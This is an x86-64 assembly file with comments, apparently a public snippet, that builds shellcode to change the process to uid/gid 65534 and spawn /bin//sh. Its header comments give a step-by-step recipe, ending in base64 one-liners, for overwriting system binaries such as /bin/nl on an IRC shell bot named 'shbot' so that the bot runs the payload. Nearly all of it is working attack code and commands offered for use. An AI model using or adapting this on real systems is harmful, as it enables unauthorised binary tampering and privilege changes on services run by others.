; su in x86-64 for abusing shbot on irc.freenode.org/#bash.
; we overwrite .text section of a donor binary with our code to save writing a big ELF header.
; mute (m@san.aq) 07jul2015. public domain.
; 1. get offset for target binary
; (/bin/nl is 6288 and /bin/[ is 5696; good luck getting other binaries off shbot)
; objdump -h ~/nl.shbot | awk '/text/{print "ibase=16;"toupper($6)}' | bc
; 2. build this file with nasm
; nasm -f bin su su.asm
; 3. get base64 encoded
; base64 -w 0 ./su
; 4. run on shbot
; # cd /bin;(head -c5696;read -N33;recode /64<<<VlJmv/7/McCwag8FsGkPBVpeSLsvYmluLy9zaDHAUFNIieewOw8F;cat)>tr<[;tr -c id
; # recode /64<<<VlJmv/7/McCwag8FsGkPBVpeSLsvYmluLy9zaDHAUFNIieewOw8F|2<&-dd of=/bin/nl bs=8 seek=786 conv=notrunc;nl -c id
BITS 64
; main(rdi=argc, rsi=argv, rdx=envp)
push rsi ; argv
push rdx ; envp
; mov rdi, 65534
mov di, 65534
xor eax, eax
mov al, 106 ; setgid(%rdi)
syscall
; mov rdi, 65534
mov al, 105 ; setuid(%rdi)
syscall
pop rdx ; envp
pop rsi ; argv
mov rbx, '/bin//sh'
xor eax, eax
push rax ; null-terminate program name
push rbx ; /bin//sh
mov rdi, rsp ; program
mov al, 0x3b ; execv(program,argv,envp)
syscall
Comments